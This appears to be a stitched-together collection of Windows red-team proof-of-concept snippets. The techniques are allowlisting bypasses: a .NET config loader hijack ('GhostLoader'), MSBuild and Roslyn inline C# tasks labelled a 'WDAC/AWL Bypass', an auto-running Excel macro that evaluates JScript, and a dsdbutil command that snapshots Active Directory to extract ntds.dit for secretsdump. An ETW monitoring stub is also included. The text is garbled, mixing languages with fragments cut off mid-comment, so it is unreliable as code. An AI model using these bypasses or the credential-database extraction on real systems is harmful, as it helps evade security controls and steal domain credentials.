GhostLoader Steps :)
1. Create C:\Tools
2. Copy any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same directory
5. Execute C:\Tools\FileHistory.exe

#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()

// A quick POC for monitoring .NET assembly load events with ETW
// References:
// - Microsoft CLR Provider: https://docs.microsoft.com/en-us/dotnet/framework/performance/clr-etw-providers
// - ETW Assembly Load Events: https://docs.microsoft.com/en-us/dotnet/framework/performance/loader-etw-events
// - Source Code Sample: https://github.com/microsoft/perfview/blob/master/src/TraceEvent/Samples/31_KernelAndClrMonitor.cs
using Microsoft.Diagnostics.Tracing;
using Microsoft.Diagnostics.Tracing.Parsers;
using Microsoft.Diagnostics.Tracing.Session;
using System;

Sub Workbook_Open()
    RunMe
End Sub
Function RunMe()
    Dim ScriptEngine
    Set ScriptEngine = CreateObject("MSScriptControl.ScriptControl")
    ScriptEngine.Language = "JScript"
    ScriptEngine.Eval ("var shell = new ActiveXObject('WScript.Shell');shell.Popup('text');")
End Function

#include "pch.h"
#include <windows.h>   // MessageBox, BOOL, APIENTRY, HMODULE
#define EXPORT extern "C" __declspec(dllexport)
// Exported test function: shows a message box so that a successful load is visible
EXPORT void HelloWorld()
{
    MessageBox(0, L"Hello World!", 0, 0);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    // Nothing to do on attach/detach; returning TRUE lets the loader accept the DLL
    return TRUE;
}

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <UsingTask TaskName="HelloWorld" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Fragment" Language="cs">
        <![CDATA[Console.WriteLine(":-) CSHARP :-)");]]>
      </Code>
    </Task>
  </UsingTask>
  <Target Name="Build">
    <HelloWorld />
  </Target>
</Project>

DSDButil
========
- dsdbutil (dsdbutil.exe) is a utility for performing maintenance on AD LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using the snapshot GUID obtained from the command output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
  <Target Name="Hello" >
    <!-- Call ANY .NET API -->
    <!--
    Author: Casey Smith, Twitter: @subTee
    License: BSD 3-Clause

<!-- dotnet.exe msbuild rosylyn_poc.csproj -->
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Roslyn Compiler -->
<Project DefaultTargets="Build">
  <UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
    <Task>
      <Code Type="Fragment" Language="cs">
        <![CDATA[Console.WriteLine($":-) CSHARP :-)");]]>
      </Code>
    </Task>
  </UsingTask>
  <Target Name="Build">
    <HelloWorld />
  </Target>
</Project>

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause